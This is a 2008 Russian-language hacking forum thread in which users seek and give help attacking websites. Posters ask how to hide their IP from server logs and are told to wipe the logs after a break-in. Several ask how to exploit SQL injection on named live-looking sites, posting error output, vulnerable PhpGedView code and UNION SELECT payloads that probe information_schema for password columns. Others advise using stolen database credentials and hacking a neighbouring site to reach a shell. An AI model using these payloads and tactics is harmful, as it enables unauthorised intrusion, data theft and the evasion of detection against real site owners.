Ваши вопросы по уязвимостям.

masterBlack · 2 Sep 2008

Ясн...:---(

gisTy · 2 Sep 2008

вообще-то логи ведутся всегда (если конечно админ сам не отключил логирование).. другой вопрос смотрит ли админ в эти логи... если смотрит, то все ваши запросы там есть, значит видно где дырка и ее нужно исправить=)

masterBlack · 2 Sep 2008

Ясн...а мона этого как то избежат?
ну чтоб мои запросы не попадали в логи...

masterBlack · 2 Sep 2008

А Моя айпиха тож там светица?

gisTy · 2 Sep 2008

Избежать нельзя.. Если только после взлома как такого не почистить логи. Твой Ip так же записывается в логах.

masterBlack · 2 Sep 2008

Ясн...
мля чувствую влипну кодат по неопытности...я то думал носки одевать кода в админику вхожу...а оно...

tor4) · 2 Sep 2008

Что-же чистить после взлома?
Или где же эти логи?

reZon · 2 Sep 2008

Добрый день... из нескольких сайтов на хостинге нашел только один выдающий мне ошибку... но что-то я не догоняю...
http://www.site.ru/(любое значени)
если значение правильное ты выдается страница с инфой...
если аргумент число но неправильное то - нет такого раздела
В отсальных случаях...
НЕВОЗМОЖНО ВЫПОЛНИТЬ ЗАПРОС SELECT * FROM tree t, content c WHERE t.category_id=c.category_id AND t.category_id=1' потому что syntax error near ''' at line 1
Пробовал подбирать order by....
/1+order+by+10/*
в итоге всега одна и таже ошибка...
НЕВОЗМОЖНО ВЫПОЛНИТЬ ЗАПРОС SELECT * FROM tree t, content c WHERE t.category_id=c.category_id AND t.category_id=1+order+by+10 потому что syntax error near 'order+by+10' at line 1
Помогите плиз нубу...

none222 · 2 Sep 2008

может стоит открытая скобка, её нужно закрыть, можно попробовать group by, можно попробовать без пробелов, а с /**/, а может в конце нужно ставить не /*, а +--+. так и не угадаешь что там у тебя - адрес бы сказал

reZon · 2 Sep 2008

o3 said:

может стоит открытая скобка, её нужно закрыть, можно попробовать group by, можно попробовать без пробелов, а с /**/, а может в конце нужно ставить не /*, а +--+. так и не угадаешь что там у тебя - адрес бы сказал
Click to expand...

Чего-то у меня никак =(

http://www.akkork.ru/

login999 · 2 Sep 2008

2 Art-Ge-Force таблицы теперь угадывай

Ershik · 2 Sep 2008

http://man.firstvds.ru/mediaviewer.php?mid=M20'

ERROR:-2 DB Error: syntax error
SQL:SELECT mm_gid FROM media_mapping WHERE mm_media='M20\' AND mm_gedfile='1' [nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1]
Click to expand...

Система PhpGedView
Как можно раскрутить иньекцию?

Бажный кусок кода:

$dbq = "SELECT mm_gid FROM ".$TBLPREFIX."media_mapping WHERE mm_media='".$mid."' AND mm_gedfile='".$GEDCOMS[$GEDCOM]['id']."'";
$dbr = dbquery($dbq);
while($row = $dbr->fetchRow()) {
if ($row[0] != $mid){
$media[$row[0]] = id_type($row[0]);
}
}
$medialist[$keyMediaList]['LINKS'] = $media;
return $media;
}
//Basically calls the get_media_relations method but it uses a file name rather than a media id.
function get_media_relations_with_file_name($filename){
global $TBLPREFIX, $BUILDING_INDEX, $DBCONN, $GEDCOMS, $GEDCOM;
$dbq = "select m_media from ".$TBLPREFIX."media where m_file='".$filename."' and m_gedfile='".$GEDCOMS[$GEDCOM]['id']."'";
$dbr = dbquery($dbq);
if (isset($dbr)){
while($result = $dbr->fetchRow()) {
$media_id = $result[0];
$media_array = get_media_relations($media_id);
return $media_array;
}
}
else{
return array();
}
}
Click to expand...

sabe · 2 Sep 2008

Ershik

http://man.firstvds.ru/mediaviewer.php?mid=M20%2527
Click to expand...

может чтото типа такого ?

Ershik · 2 Sep 2008

Нет, при правильном запросте должно лицо выскакивать
http://man.firstvds.ru/mediaviewer.php?mid=M20

Не могу правильно составить запрос и поля.

Ch3ck · 2 Sep 2008

http://www.wormshop.nl/news.php?id=-1+union+select+1,2,3,table_schema,5,6+from+informa tion_schema.tables/*
Click to expand...

Сразу так:
_+union+select+111,222,concat_ws(0x3a,table_name,table_schema),555,666+from+information_schema.columns+where+column_name+like+CHAR(37,112,97,115,37)+limit+0,1/*

Велемир · 2 Sep 2008

Чёт я не догнал,а где вывод?)

none222 · 3 Sep 2008

2reZon
покажи где инъекция - впадлу искать

2Ershik
никак - там ковычки экранизируются, а параметр в ковычках

.Striker · 3 Sep 2008

у меня есть данные от бд хост логин база пароль, но на сервере нету phpMyAdmin
каким образом можно выполнить запрос в базе?

DimOnOID · 3 Sep 2008

.Striker said:

у меня есть данные от бд хост логин база пароль, но на сервере нету phpMyAdmin
каким образом можно выполнить запрос в базе?
Click to expand...

пробуй коннкет на 3306 порт...
Так же пробуй похекать какой нить сайт через Reverse IP и подключиттца через шелл на похеканном сайте......

aka PSIH · 3 Sep 2008

.Striker
1. файлы на сервер заливать можешь? Если можешь то залей RstMysql....
2. Попробуй удаленно к базе подключиться, тем же RstMysql...

Ваши вопросы по уязвимостям.

masterBlack New Member

gisTy Elder - Старейшина

masterBlack New Member

masterBlack New Member

gisTy Elder - Старейшина

masterBlack New Member

tor4) Elder - Старейшина

reZon New Member

none222 Guest

reZon New Member

login999 Elder - Старейшина

Ershik Elder - Старейшина

sabe Elder - Старейшина

Ershik Elder - Старейшина

Ch3ck Elder - Старейшина

Велемир Banned

none222 Guest

.Striker Elder - Старейшина

DimOnOID Banned

aka PSIH Elder - Старейшина

Useful Searches

Ваши вопросы по уязвимостям.

masterBlack New Member

gisTy Elder - Старейшина

masterBlack New Member

masterBlack New Member

gisTy Elder - Старейшина

masterBlack New Member

tor4) Elder - Старейшина

reZon New Member

none222 Guest

reZon New Member

login999 Elder - Старейшина

Ershik Elder - Старейшина

sabe Elder - Старейшина

Ershik Elder - Старейшина

Ch3ck Elder - Старейшина

Велемир Banned

none222 Guest

.Striker Elder - Старейшина

DimOnOID Banned

aka PSIH Elder - Старейшина